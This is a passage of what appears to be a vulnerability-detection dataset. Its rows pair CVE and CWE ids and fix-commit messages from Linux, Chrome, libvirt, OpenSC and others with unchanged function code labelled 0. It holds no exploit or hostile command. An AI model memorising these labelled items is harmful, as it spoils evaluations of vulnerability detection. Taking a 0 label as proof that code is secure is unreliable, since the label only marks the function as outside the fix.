Cr-Commit-Position: refs/heads/master@{#443338} | base::string16 Browser::GetWindowTitleForCurrentTab(
bool include_app_name) const {
return GetWindowTitleFromWebContents(
include_app_name, tab_strip_model_->GetActiveWebContents());
}
| base::string16 Browser::GetWindowTitleForCurrentTab(
bool include_app_name) const {
return GetWindowTitleFromWebContents(
include_app_name, tab_strip_model_->GetActiveWebContents());
}
| C | Chrome | 0 |
CVE-2013-7271 | https://www.cvedetails.com/cve/CVE-2013-7271/ | CWE-20 | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | static int ltalk_rcv(struct sk_buff *skb, struct net_device *dev,
struct packet_type *pt, struct net_device *orig_dev)
{
if (!net_eq(dev_net(dev), &init_net))
goto freeit;
/* Expand any short form frames */
if (skb_mac_header(skb)[2] == 1) {
struct ddpehdr *ddp;
/* Find our address */
struct atalk_addr *ap = atalk_find_dev_addr(dev);
if (!ap || skb->len < sizeof(__be16) || skb->len > 1023)
goto freeit;
/* Don't mangle buffer if shared */
if (!(skb = skb_share_check(skb, GFP_ATOMIC)))
return 0;
/*
* The push leaves us with a ddephdr not an shdr, and
* handily the port bytes in the right place preset.
*/
ddp = (struct ddpehdr *) skb_push(skb, sizeof(*ddp) - 4);
/* Now fill in the long header */
/*
* These two first. The mac overlays the new source/dest
* network information so we MUST copy these before
* we write the network numbers !
*/
ddp->deh_dnode = skb_mac_header(skb)[0]; /* From physical header */
ddp->deh_snode = skb_mac_header(skb)[1]; /* From physical header */
ddp->deh_dnet = ap->s_net; /* Network number */
ddp->deh_snet = ap->s_net;
ddp->deh_sum = 0; /* No checksum */
/*
* Not sure about this bit...
*/
/* Non routable, so force a drop if we slip up later */
ddp->deh_len_hops = htons(skb->len + (DDP_MAXHOPS << 10));
}
skb_reset_transport_header(skb);
return atalk_rcv(skb, dev, pt, orig_dev);
freeit:
kfree_skb(skb);
return 0;
}
| static int ltalk_rcv(struct sk_buff *skb, struct net_device *dev,
struct packet_type *pt, struct net_device *orig_dev)
{
if (!net_eq(dev_net(dev), &init_net))
goto freeit;
/* Expand any short form frames */
if (skb_mac_header(skb)[2] == 1) {
struct ddpehdr *ddp;
/* Find our address */
struct atalk_addr *ap = atalk_find_dev_addr(dev);
if (!ap || skb->len < sizeof(__be16) || skb->len > 1023)
goto freeit;
/* Don't mangle buffer if shared */
if (!(skb = skb_share_check(skb, GFP_ATOMIC)))
return 0;
/*
* The push leaves us with a ddephdr not an shdr, and
* handily the port bytes in the right place preset.
*/
ddp = (struct ddpehdr *) skb_push(skb, sizeof(*ddp) - 4);
/* Now fill in the long header */
/*
* These two first. The mac overlays the new source/dest
* network information so we MUST copy these before
* we write the network numbers !
*/
ddp->deh_dnode = skb_mac_header(skb)[0]; /* From physical header */
ddp->deh_snode = skb_mac_header(skb)[1]; /* From physical header */
ddp->deh_dnet = ap->s_net; /* Network number */
ddp->deh_snet = ap->s_net;
ddp->deh_sum = 0; /* No checksum */
/*
* Not sure about this bit...
*/
/* Non routable, so force a drop if we slip up later */
ddp->deh_len_hops = htons(skb->len + (DDP_MAXHOPS << 10));
}
skb_reset_transport_header(skb);
return atalk_rcv(skb, dev, pt, orig_dev);
freeit:
kfree_skb(skb);
return 0;
}
| C | linux | 0 |
CVE-2011-2479 | https://www.cvedetails.com/cve/CVE-2011-2479/ | CWE-399 | https://github.com/torvalds/linux/commit/78f11a255749d09025f54d4e2df4fbcb031530e2 | 78f11a255749d09025f54d4e2df4fbcb031530e2 | mm: thp: fix /dev/zero MAP_PRIVATE and vm_flags cleanups
The huge_memory.c THP page fault was allowed to run if vm_ops was null
(which would succeed for /dev/zero MAP_PRIVATE, as the f_op->mmap wouldn't
setup a special vma->vm_ops and it would fallback to regular anonymous
memory) but other THP logics weren't fully activated for vmas with vm_file
not NULL (/dev/zero has a not NULL vma->vm_file).
So this removes the vm_file checks so that /dev/zero also can safely use
THP (the other albeit safer approach to fix this bug would have been to
prevent the THP initial page fault to run if vm_file was set).
After removing the vm_file checks, this also makes huge_memory.c stricter
in khugepaged for the DEBUG_VM=y case. It doesn't replace the vm_file
check with a is_pfn_mapping check (but it keeps checking for VM_PFNMAP
under VM_BUG_ON) because for a is_cow_mapping() mapping VM_PFNMAP should
only be allowed to exist before the first page fault, and in turn when
vma->anon_vma is null (so preventing khugepaged registration). So I tend
to think the previous comment saying if vm_file was set, VM_PFNMAP might
have been set and we could still be registered in khugepaged (despite
anon_vma was not NULL to be registered in khugepaged) was too paranoid.
The is_linear_pfn_mapping check is also I think superfluous (as described
by comment) but under DEBUG_VM it is safe to stay.
Addresses https://bugzilla.kernel.org/show_bug.cgi?id=33682
Signed-off-by: Andrea Arcangeli <aarcange@redhat.com>
Reported-by: Caspar Zhang <bugs@casparzhang.com>
Acked-by: Mel Gorman <mel@csn.ul.ie>
Acked-by: Rik van Riel <riel@redhat.com>
Cc: <stable@kernel.org> [2.6.38.x]
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | static int khugepaged_has_work(void)
{
return !list_empty(&khugepaged_scan.mm_head) &&
khugepaged_enabled();
}
| static int khugepaged_has_work(void)
{
return !list_empty(&khugepaged_scan.mm_head) &&
khugepaged_enabled();
}
| C | linux | 0 |
CVE-2014-2739 | https://www.cvedetails.com/cve/CVE-2014-2739/ | CWE-20 | https://github.com/torvalds/linux/commit/b2853fd6c2d0f383dbdf7427e263eb576a633867 | b2853fd6c2d0f383dbdf7427e263eb576a633867 | IB/core: Don't resolve passive side RoCE L2 address in CMA REQ handler
The code that resolves the passive side source MAC within the rdma_cm
connection request handler was both redundant and buggy, so remove it.
It was redundant since later, when an RC QP is modified to RTR state,
the resolution will take place in the ib_core module. It was buggy
because this callback also deals with UD SIDR exchange, for which we
incorrectly looked at the REQ member of the CM event and dereferenced
a random value.
Fixes: dd5f03beb4f7 ("IB/core: Ethernet L2 attributes in verbs/cm structures")
Signed-off-by: Moni Shoua <monis@mellanox.com>
Signed-off-by: Or Gerlitz <ogerlitz@mellanox.com>
Signed-off-by: Roland Dreier <roland@purestorage.com> | int ib_cm_init_qp_attr(struct ib_cm_id *cm_id,
struct ib_qp_attr *qp_attr,
int *qp_attr_mask)
{
struct cm_id_private *cm_id_priv;
int ret;
cm_id_priv = container_of(cm_id, struct cm_id_private, id);
switch (qp_attr->qp_state) {
case IB_QPS_INIT:
ret = cm_init_qp_init_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
case IB_QPS_RTR:
ret = cm_init_qp_rtr_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
case IB_QPS_RTS:
ret = cm_init_qp_rts_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
default:
ret = -EINVAL;
break;
}
return ret;
}
| int ib_cm_init_qp_attr(struct ib_cm_id *cm_id,
struct ib_qp_attr *qp_attr,
int *qp_attr_mask)
{
struct cm_id_private *cm_id_priv;
int ret;
cm_id_priv = container_of(cm_id, struct cm_id_private, id);
switch (qp_attr->qp_state) {
case IB_QPS_INIT:
ret = cm_init_qp_init_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
case IB_QPS_RTR:
ret = cm_init_qp_rtr_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
case IB_QPS_RTS:
ret = cm_init_qp_rts_attr(cm_id_priv, qp_attr, qp_attr_mask);
break;
default:
ret = -EINVAL;
break;
}
return ret;
}
| C | linux | 0 |
CVE-2018-17570 | https://www.cvedetails.com/cve/CVE-2018-17570/ | CWE-190 | https://github.com/viabtc/viabtc_exchange_server/commit/4a7c27bfe98f409623d4d857894d017ff0672cc9#diff-515c81af848352583bff286d6224875f | 4a7c27bfe98f409623d4d857894d017ff0672cc9#diff-515c81af848352583bff286d6224875f | Merge pull request #131 from benjaminchodroff/master
fix memory corruption and other 32bit overflows | static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
| static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
| C | viabtc_exchange_server | 0 |
CVE-2012-2896 | https://www.cvedetails.com/cve/CVE-2012-2896/ | CWE-189 | https://github.com/chromium/chromium/commit/3aad1a37affb1ab70d1897f2b03eb8c077264984 | 3aad1a37affb1ab70d1897f2b03eb8c077264984 | Fix SafeAdd and SafeMultiply
BUG=145648,145544
Review URL: https://chromiumcodereview.appspot.com/10916165
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@155478 0039d316-1c4b-4281-b951-d872f2087c98 | static GLenum ExtractTypeFromStorageFormat(GLenum internalformat) {
switch (internalformat) {
case GL_RGB565:
return GL_UNSIGNED_SHORT_5_6_5;
case GL_RGBA4:
return GL_UNSIGNED_SHORT_4_4_4_4;
case GL_RGB5_A1:
return GL_UNSIGNED_SHORT_5_5_5_1;
case GL_RGB8_OES:
return GL_UNSIGNED_BYTE;
case GL_RGBA8_OES:
return GL_UNSIGNED_BYTE;
case GL_LUMINANCE8_ALPHA8_EXT:
return GL_UNSIGNED_BYTE;
case GL_LUMINANCE8_EXT:
return GL_UNSIGNED_BYTE;
case GL_ALPHA8_EXT:
return GL_UNSIGNED_BYTE;
case GL_RGBA32F_EXT:
return GL_FLOAT;
case GL_RGB32F_EXT:
return GL_FLOAT;
case GL_ALPHA32F_EXT:
return GL_FLOAT;
case GL_LUMINANCE32F_EXT:
return GL_FLOAT;
case GL_LUMINANCE_ALPHA32F_EXT:
return GL_FLOAT;
case GL_RGBA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_RGB16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_ALPHA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_LUMINANCE16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_LUMINANCE_ALPHA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_BGRA8_EXT:
return GL_UNSIGNED_BYTE;
default:
return GL_NONE;
}
}
| static GLenum ExtractTypeFromStorageFormat(GLenum internalformat) {
switch (internalformat) {
case GL_RGB565:
return GL_UNSIGNED_SHORT_5_6_5;
case GL_RGBA4:
return GL_UNSIGNED_SHORT_4_4_4_4;
case GL_RGB5_A1:
return GL_UNSIGNED_SHORT_5_5_5_1;
case GL_RGB8_OES:
return GL_UNSIGNED_BYTE;
case GL_RGBA8_OES:
return GL_UNSIGNED_BYTE;
case GL_LUMINANCE8_ALPHA8_EXT:
return GL_UNSIGNED_BYTE;
case GL_LUMINANCE8_EXT:
return GL_UNSIGNED_BYTE;
case GL_ALPHA8_EXT:
return GL_UNSIGNED_BYTE;
case GL_RGBA32F_EXT:
return GL_FLOAT;
case GL_RGB32F_EXT:
return GL_FLOAT;
case GL_ALPHA32F_EXT:
return GL_FLOAT;
case GL_LUMINANCE32F_EXT:
return GL_FLOAT;
case GL_LUMINANCE_ALPHA32F_EXT:
return GL_FLOAT;
case GL_RGBA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_RGB16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_ALPHA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_LUMINANCE16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_LUMINANCE_ALPHA16F_EXT:
return GL_HALF_FLOAT_OES;
case GL_BGRA8_EXT:
return GL_UNSIGNED_BYTE;
default:
return GL_NONE;
}
}
| C | Chrome | 0 |
CVE-2013-4130 | https://www.cvedetails.com/cve/CVE-2013-4130/ | CWE-399 | https://cgit.freedesktop.org/spice/spice/commit/?id=53488f0275d6c8a121af49f7ac817d09ce68090d | 53488f0275d6c8a121af49f7ac817d09ce68090d | null | void red_channel_client_pipe_add_type(RedChannelClient *rcc, int pipe_item_type)
{
PipeItem *item = spice_new(PipeItem, 1);
red_channel_pipe_item_init(rcc->channel, item, pipe_item_type);
red_channel_client_pipe_add(rcc, item);
red_channel_client_push(rcc);
}
| void red_channel_client_pipe_add_type(RedChannelClient *rcc, int pipe_item_type)
{
PipeItem *item = spice_new(PipeItem, 1);
red_channel_pipe_item_init(rcc->channel, item, pipe_item_type);
red_channel_client_pipe_add(rcc, item);
red_channel_client_push(rcc);
}
| C | spice | 0 |
CVE-2016-10746 | https://www.cvedetails.com/cve/CVE-2016-10746/ | CWE-254 | https://github.com/libvirt/libvirt/commit/506e9d6c2d4baaf580d489fff0690c0ff2ff588f | 506e9d6c2d4baaf580d489fff0690c0ff2ff588f | virDomainGetTime: Deny on RO connections
We have a policy that if API may end up talking to a guest agent
it should require RW connection. We don't obey the rule in
virDomainGetTime().
Signed-off-by: Michal Privoznik <mprivozn@redhat.com> | virDomainBlockRebase(virDomainPtr dom, const char *disk,
const char *base, unsigned long bandwidth,
unsigned int flags)
{
virConnectPtr conn;
VIR_DOMAIN_DEBUG(dom, "disk=%s, base=%s, bandwidth=%lu, flags=%x",
disk, NULLSTR(base), bandwidth, flags);
virResetLastError();
virCheckDomainReturn(dom, -1);
conn = dom->conn;
virCheckReadOnlyGoto(conn->flags, error);
virCheckNonNullArgGoto(disk, error);
if (flags & VIR_DOMAIN_BLOCK_REBASE_COPY) {
virCheckNonNullArgGoto(base, error);
} else if (flags & (VIR_DOMAIN_BLOCK_REBASE_SHALLOW |
VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
VIR_DOMAIN_BLOCK_REBASE_COPY_RAW |
VIR_DOMAIN_BLOCK_REBASE_COPY_DEV)) {
virReportInvalidArg(flags, "%s",
_("use of flags requires a copy job"));
goto error;
}
if (conn->driver->domainBlockRebase) {
int ret;
ret = conn->driver->domainBlockRebase(dom, disk, base, bandwidth,
flags);
if (ret < 0)
goto error;
return ret;
}
virReportUnsupportedError();
error:
virDispatchError(dom->conn);
return -1;
}
| virDomainBlockRebase(virDomainPtr dom, const char *disk,
const char *base, unsigned long bandwidth,
unsigned int flags)
{
virConnectPtr conn;
VIR_DOMAIN_DEBUG(dom, "disk=%s, base=%s, bandwidth=%lu, flags=%x",
disk, NULLSTR(base), bandwidth, flags);
virResetLastError();
virCheckDomainReturn(dom, -1);
conn = dom->conn;
virCheckReadOnlyGoto(conn->flags, error);
virCheckNonNullArgGoto(disk, error);
if (flags & VIR_DOMAIN_BLOCK_REBASE_COPY) {
virCheckNonNullArgGoto(base, error);
} else if (flags & (VIR_DOMAIN_BLOCK_REBASE_SHALLOW |
VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
VIR_DOMAIN_BLOCK_REBASE_COPY_RAW |
VIR_DOMAIN_BLOCK_REBASE_COPY_DEV)) {
virReportInvalidArg(flags, "%s",
_("use of flags requires a copy job"));
goto error;
}
if (conn->driver->domainBlockRebase) {
int ret;
ret = conn->driver->domainBlockRebase(dom, disk, base, bandwidth,
flags);
if (ret < 0)
goto error;
return ret;
}
virReportUnsupportedError();
error:
virDispatchError(dom->conn);
return -1;
}
| C | libvirt | 0 |
CVE-2016-5200 | https://www.cvedetails.com/cve/CVE-2016-5200/ | CWE-119 | https://github.com/chromium/chromium/commit/2f19869af13bbfdcfd682a55c0d2c61c6e102475 | 2f19869af13bbfdcfd682a55c0d2c61c6e102475 | chrome/browser/ui/webauthn: long domains may cause a line break.
As requested by UX in [1], allow long host names to split a title into
two lines. This allows us to show more of the name before eliding,
although sufficiently long names will still trigger elision.
Screenshot at
https://drive.google.com/open?id=1_V6t2CeZDAVazy3Px-OET2LnB__aEW1r.
[1] https://docs.google.com/presentation/d/1TtxkPUchyVZulqgdMcfui-68B0W-DWaFFVJEffGIbLA/edit#slide=id.g5913c4105f_1_12
Change-Id: I70f6541e0db3e9942239304de43b487a7561ca34
Bug: 870892
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1601812
Auto-Submit: Adam Langley <agl@chromium.org>
Commit-Queue: Nina Satragno <nsatragno@chromium.org>
Reviewed-by: Nina Satragno <nsatragno@chromium.org>
Cr-Commit-Position: refs/heads/master@{#658114} | const gfx::VectorIcon& AuthenticatorTimeoutErrorModel::GetStepIllustration(
ImageColorScheme color_scheme) const {
return color_scheme == ImageColorScheme::kDark ? kWebauthnErrorDarkIcon
: kWebauthnErrorIcon;
}
| const gfx::VectorIcon& AuthenticatorTimeoutErrorModel::GetStepIllustration(
ImageColorScheme color_scheme) const {
return color_scheme == ImageColorScheme::kDark ? kWebauthnErrorDarkIcon
: kWebauthnErrorIcon;
}
| C | Chrome | 0 |
CVE-2018-16427 | https://www.cvedetails.com/cve/CVE-2018-16427/ | CWE-125 | https://github.com/OpenSC/OpenSC/pull/1447/commits/8fe377e93b4b56060e5bbfb6f3142ceaeca744fa | 8fe377e93b4b56060e5bbfb6f3142ceaeca744fa | fixed out of bounds reads
Thanks to Eric Sesterhenn from X41 D-SEC GmbH
for reporting and suggesting security fixes. | static int coolkey_get_init_and_get_count(list_t *list, int *countp)
{
*countp = list_size(list);
list_iterator_start(list);
return SC_SUCCESS;
}
| static int coolkey_get_init_and_get_count(list_t *list, int *countp)
{
*countp = list_size(list);
list_iterator_start(list);
return SC_SUCCESS;
}
| C | OpenSC | 0 |
CVE-2013-1828 | https://www.cvedetails.com/cve/CVE-2013-1828/ | CWE-20 | https://github.com/torvalds/linux/commit/726bc6b092da4c093eb74d13c07184b18c1af0f1 | 726bc6b092da4c093eb74d13c07184b18c1af0f1 | net/sctp: Validate parameter size for SCTP_GET_ASSOC_STATS
Building sctp may fail with:
In function ‘copy_from_user’,
inlined from ‘sctp_getsockopt_assoc_stats’ at
net/sctp/socket.c:5656:20:
arch/x86/include/asm/uaccess_32.h:211:26: error: call to
‘copy_from_user_overflow’ declared with attribute error: copy_from_user()
buffer size is not provably correct
if built with W=1 due to a missing parameter size validation
before the call to copy_from_user.
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Acked-by: Vlad Yasevich <vyasevich@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | int sctp_inet_listen(struct socket *sock, int backlog)
{
struct sock *sk = sock->sk;
struct sctp_endpoint *ep = sctp_sk(sk)->ep;
int err = -EINVAL;
if (unlikely(backlog < 0))
return err;
sctp_lock_sock(sk);
/* Peeled-off sockets are not allowed to listen(). */
if (sctp_style(sk, UDP_HIGH_BANDWIDTH))
goto out;
if (sock->state != SS_UNCONNECTED)
goto out;
/* If backlog is zero, disable listening. */
if (!backlog) {
if (sctp_sstate(sk, CLOSED))
goto out;
err = 0;
sctp_unhash_endpoint(ep);
sk->sk_state = SCTP_SS_CLOSED;
if (sk->sk_reuse)
sctp_sk(sk)->bind_hash->fastreuse = 1;
goto out;
}
/* If we are already listening, just update the backlog */
if (sctp_sstate(sk, LISTENING))
sk->sk_max_ack_backlog = backlog;
else {
err = sctp_listen_start(sk, backlog);
if (err)
goto out;
}
err = 0;
out:
sctp_release_sock(sk);
return err;
}
| int sctp_inet_listen(struct socket *sock, int backlog)
{
struct sock *sk = sock->sk;
struct sctp_endpoint *ep = sctp_sk(sk)->ep;
int err = -EINVAL;
if (unlikely(backlog < 0))
return err;
sctp_lock_sock(sk);
/* Peeled-off sockets are not allowed to listen(). */
if (sctp_style(sk, UDP_HIGH_BANDWIDTH))
goto out;
if (sock->state != SS_UNCONNECTED)
goto out;
/* If backlog is zero, disable listening. */
if (!backlog) {
if (sctp_sstate(sk, CLOSED))
goto out;
err = 0;
sctp_unhash_endpoint(ep);
sk->sk_state = SCTP_SS_CLOSED;
if (sk->sk_reuse)
sctp_sk(sk)->bind_hash->fastreuse = 1;
goto out;
}
/* If we are already listening, just update the backlog */
if (sctp_sstate(sk, LISTENING))
sk->sk_max_ack_backlog = backlog;
else {
err = sctp_listen_start(sk, backlog);
if (err)
goto out;
}
err = 0;
out:
sctp_release_sock(sk);
return err;
}
| C | linux | 0 |
CVE-2014-7145 | https://www.cvedetails.com/cve/CVE-2014-7145/ | CWE-399 | https://github.com/torvalds/linux/commit/18f39e7be0121317550d03e267e3ebd4dbfbb3ce | 18f39e7be0121317550d03e267e3ebd4dbfbb3ce | [CIFS] Possible null ptr deref in SMB2_tcon
As Raphael Geissert pointed out, tcon_error_exit can dereference tcon
and there is one path in which tcon can be null.
Signed-off-by: Steve French <smfrench@gmail.com>
CC: Stable <stable@vger.kernel.org> # v3.7+
Reported-by: Raphael Geissert <geissert@debian.org> | SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
u64 persistent_fid, u64 volatile_fid, int index,
struct cifs_search_info *srch_inf)
{
struct smb2_query_directory_req *req;
struct smb2_query_directory_rsp *rsp = NULL;
struct kvec iov[2];
int rc = 0;
int len;
int resp_buftype;
unsigned char *bufptr;
struct TCP_Server_Info *server;
struct cifs_ses *ses = tcon->ses;
__le16 asteriks = cpu_to_le16('*');
char *end_of_smb;
unsigned int output_size = CIFSMaxBufSize;
size_t info_buf_size;
if (ses && (ses->server))
server = ses->server;
else
return -EIO;
rc = small_smb2_init(SMB2_QUERY_DIRECTORY, tcon, (void **) &req);
if (rc)
return rc;
switch (srch_inf->info_level) {
case SMB_FIND_FILE_DIRECTORY_INFO:
req->FileInformationClass = FILE_DIRECTORY_INFORMATION;
info_buf_size = sizeof(FILE_DIRECTORY_INFO) - 1;
break;
case SMB_FIND_FILE_ID_FULL_DIR_INFO:
req->FileInformationClass = FILEID_FULL_DIRECTORY_INFORMATION;
info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO) - 1;
break;
default:
cifs_dbg(VFS, "info level %u isn't supported\n",
srch_inf->info_level);
rc = -EINVAL;
goto qdir_exit;
}
req->FileIndex = cpu_to_le32(index);
req->PersistentFileId = persistent_fid;
req->VolatileFileId = volatile_fid;
len = 0x2;
bufptr = req->Buffer;
memcpy(bufptr, &asteriks, len);
req->FileNameOffset =
cpu_to_le16(sizeof(struct smb2_query_directory_req) - 1 - 4);
req->FileNameLength = cpu_to_le16(len);
/*
* BB could be 30 bytes or so longer if we used SMB2 specific
* buffer lengths, but this is safe and close enough.
*/
output_size = min_t(unsigned int, output_size, server->maxBuf);
output_size = min_t(unsigned int, output_size, 2 << 15);
req->OutputBufferLength = cpu_to_le32(output_size);
iov[0].iov_base = (char *)req;
/* 4 for RFC1001 length and 1 for Buffer */
iov[0].iov_len = get_rfc1002_length(req) + 4 - 1;
iov[1].iov_base = (char *)(req->Buffer);
iov[1].iov_len = len;
inc_rfc1001_len(req, len - 1 /* Buffer */);
rc = SendReceive2(xid, ses, iov, 2, &resp_buftype, 0);
rsp = (struct smb2_query_directory_rsp *)iov[0].iov_base;
if (rc) {
cifs_stats_fail_inc(tcon, SMB2_QUERY_DIRECTORY_HE);
goto qdir_exit;
}
rc = validate_buf(le16_to_cpu(rsp->OutputBufferOffset),
le32_to_cpu(rsp->OutputBufferLength), &rsp->hdr,
info_buf_size);
if (rc)
goto qdir_exit;
srch_inf->unicode = true;
if (srch_inf->ntwrk_buf_start) {
if (srch_inf->smallBuf)
cifs_small_buf_release(srch_inf->ntwrk_buf_start);
else
cifs_buf_release(srch_inf->ntwrk_buf_start);
}
srch_inf->ntwrk_buf_start = (char *)rsp;
srch_inf->srch_entries_start = srch_inf->last_entry = 4 /* rfclen */ +
(char *)&rsp->hdr + le16_to_cpu(rsp->OutputBufferOffset);
/* 4 for rfc1002 length field */
end_of_smb = get_rfc1002_length(rsp) + 4 + (char *)&rsp->hdr;
srch_inf->entries_in_buffer =
num_entries(srch_inf->srch_entries_start, end_of_smb,
&srch_inf->last_entry, info_buf_size);
srch_inf->index_of_last_entry += srch_inf->entries_in_buffer;
cifs_dbg(FYI, "num entries %d last_index %lld srch start %p srch end %p\n",
srch_inf->entries_in_buffer, srch_inf->index_of_last_entry,
srch_inf->srch_entries_start, srch_inf->last_entry);
if (resp_buftype == CIFS_LARGE_BUFFER)
srch_inf->smallBuf = false;
else if (resp_buftype == CIFS_SMALL_BUFFER)
srch_inf->smallBuf = true;
else
cifs_dbg(VFS, "illegal search buffer type\n");
if (rsp->hdr.Status == STATUS_NO_MORE_FILES)
srch_inf->endOfSearch = 1;
else
srch_inf->endOfSearch = 0;
return rc;
qdir_exit:
free_rsp_buf(resp_buftype, rsp);
return rc;
}
| SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
u64 persistent_fid, u64 volatile_fid, int index,
struct cifs_search_info *srch_inf)
{
struct smb2_query_directory_req *req;
struct smb2_query_directory_rsp *rsp = NULL;
struct kvec iov[2];
int rc = 0;
int len;
int resp_buftype;
unsigned char *bufptr;
struct TCP_Server_Info *server;
struct cifs_ses *ses = tcon->ses;
__le16 asteriks = cpu_to_le16('*');
char *end_of_smb;
unsigned int output_size = CIFSMaxBufSize;
size_t info_buf_size;
if (ses && (ses->server))
server = ses->server;
else
return -EIO;
rc = small_smb2_init(SMB2_QUERY_DIRECTORY, tcon, (void **) &req);
if (rc)
return rc;
switch (srch_inf->info_level) {
case SMB_FIND_FILE_DIRECTORY_INFO:
req->FileInformationClass = FILE_DIRECTORY_INFORMATION;
info_buf_size = sizeof(FILE_DIRECTORY_INFO) - 1;
break;
case SMB_FIND_FILE_ID_FULL_DIR_INFO:
req->FileInformationClass = FILEID_FULL_DIRECTORY_INFORMATION;
info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO) - 1;
break;
default:
cifs_dbg(VFS, "info level %u isn't supported\n",
srch_inf->info_level);
rc = -EINVAL;
goto qdir_exit;
}
req->FileIndex = cpu_to_le32(index);
req->PersistentFileId = persistent_fid;
req->VolatileFileId = volatile_fid;
len = 0x2;
bufptr = req->Buffer;
memcpy(bufptr, &asteriks, len);
req->FileNameOffset =
cpu_to_le16(sizeof(struct smb2_query_directory_req) - 1 - 4);
req->FileNameLength = cpu_to_le16(len);
/*
* BB could be 30 bytes or so longer if we used SMB2 specific
* buffer lengths, but this is safe and close enough.
*/
output_size = min_t(unsigned int, output_size, server->maxBuf);
output_size = min_t(unsigned int, output_size, 2 << 15);
req->OutputBufferLength = cpu_to_le32(output_size);
iov[0].iov_base = (char *)req;
/* 4 for RFC1001 length and 1 for Buffer */
iov[0].iov_len = get_rfc1002_length(req) + 4 - 1;
iov[1].iov_base = (char *)(req->Buffer);
iov[1].iov_len = len;
inc_rfc1001_len(req, len - 1 /* Buffer */);
rc = SendReceive2(xid, ses, iov, 2, &resp_buftype, 0);
rsp = (struct smb2_query_directory_rsp *)iov[0].iov_base;
if (rc) {
cifs_stats_fail_inc(tcon, SMB2_QUERY_DIRECTORY_HE);
goto qdir_exit;
}
rc = validate_buf(le16_to_cpu(rsp->OutputBufferOffset),
le32_to_cpu(rsp->OutputBufferLength), &rsp->hdr,
info_buf_size);
if (rc)
goto qdir_exit;
srch_inf->unicode = true;
if (srch_inf->ntwrk_buf_start) {
if (srch_inf->smallBuf)
cifs_small_buf_release(srch_inf->ntwrk_buf_start);
else
cifs_buf_release(srch_inf->ntwrk_buf_start);
}
srch_inf->ntwrk_buf_start = (char *)rsp;
srch_inf->srch_entries_start = srch_inf->last_entry = 4 /* rfclen */ +
(char *)&rsp->hdr + le16_to_cpu(rsp->OutputBufferOffset);
/* 4 for rfc1002 length field */
end_of_smb = get_rfc1002_length(rsp) + 4 + (char *)&rsp->hdr;
srch_inf->entries_in_buffer =
num_entries(srch_inf->srch_entries_start, end_of_smb,
&srch_inf->last_entry, info_buf_size);
srch_inf->index_of_last_entry += srch_inf->entries_in_buffer;
cifs_dbg(FYI, "num entries %d last_index %lld srch start %p srch end %p\n",
srch_inf->entries_in_buffer, srch_inf->index_of_last_entry,
srch_inf->srch_entries_start, srch_inf->last_entry);
if (resp_buftype == CIFS_LARGE_BUFFER)
srch_inf->smallBuf = false;
else if (resp_buftype == CIFS_SMALL_BUFFER)
srch_inf->smallBuf = true;
else
cifs_dbg(VFS, "illegal search buffer type\n");
if (rsp->hdr.Status == STATUS_NO_MORE_FILES)
srch_inf->endOfSearch = 1;
else
srch_inf->endOfSearch = 0;
return rc;
qdir_exit:
free_rsp_buf(resp_buftype, rsp);
return rc;
}
| C | linux | 0 |
